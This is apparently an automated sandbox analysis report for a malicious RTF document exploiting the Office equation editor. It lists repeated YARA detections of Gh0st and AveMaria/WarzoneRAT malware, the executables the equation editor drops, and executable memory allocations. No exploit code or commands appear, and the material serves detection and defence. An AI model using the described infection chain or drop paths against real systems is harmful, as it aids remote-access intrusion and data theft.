Source: 8.3.gnwnekc.exe.8db448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 6.2.gnwnekc.exe.434a70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.gnwnekc.exe.418070.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.3.gnwnekc.exe.8db448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mwele[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00406D5F	5_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040E52C	6_2_0040E52C
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C0F9C	6_2_003C0F9C
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C12AD	6_2_003C12AD
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040F2C7	8_2_0040F2C7
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040E52C	9_2_0040E52C
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B4AA9	9_2_003B4AA9

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf, type: SAMPLE	Matched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.3.gnwnekc.exe.8db448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8db448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.gnwnekc.exe.434a70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 6.2.gnwnekc.exe.434a70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.gnwnekc.exe.418070.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.gnwnekc.exe.418070.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8db448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.3.gnwnekc.exe.8db448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
